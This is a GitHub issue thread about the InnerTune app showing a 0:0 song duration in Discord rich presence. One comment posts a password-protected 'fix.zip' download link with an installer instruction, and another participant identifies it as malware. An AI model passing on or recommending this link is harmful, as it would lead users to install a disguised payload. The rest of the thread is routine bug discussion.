### ISSUE TITLE
Bugged song duration on discord rich presence

### ISSUE THREAD

**Issue by Kurumii-ii** [z-huang/music#1461]
### Checklist

- [X] I am able to reproduce the bug with the [latest debug version](https://github.com/z-huang/InnerTune/actions/workflows/build.yml).
- [X] I've checked that there is no open or closed issue about this bug.
- [X] This issue contains only one bug.
- [X] The title of this issue accurately describes the bug.

### Steps to reproduce the bug

1. Enable discord rich presence
2. Play any song

### Expected behavior

Shows the actual song duration

### Actual behavior

Always shows 0:0 on rich presence

### Screenshots/Screen recordings

![LdeL6cVJ](https://github.com/user-attachments/assets/17fc3656-ce88-4410-a822-7f2827a5793d)

### Logs

I dont have pc with me rn

### InnerTune version

0.5.8

### Android version

14

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kurumii-ii** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Why is this zip encrypted by password

**Comment by z-huang** [comment]
> Download [mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file](https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file) password: changeme In the installer menu, select "gcc."

Hey, what's this file for?

**Comment by Big-Iron-Cheems** [comment]
That is malware, please don't fall for bots. 
Never trust suspicious files.

**Comment by ruskcoder** [comment]
This issue for some reason only appears on mobile. If you go to a desktop client/website, the timestamp is not visible. Weird.

**Comment by z-huang** [comment]
Even if I set the end time in KizzyRPC, Discord still displays 00:00.

**Comment by Kurumii-ii** [comment]
Thats weird would it be possible to just remove the timestamp?
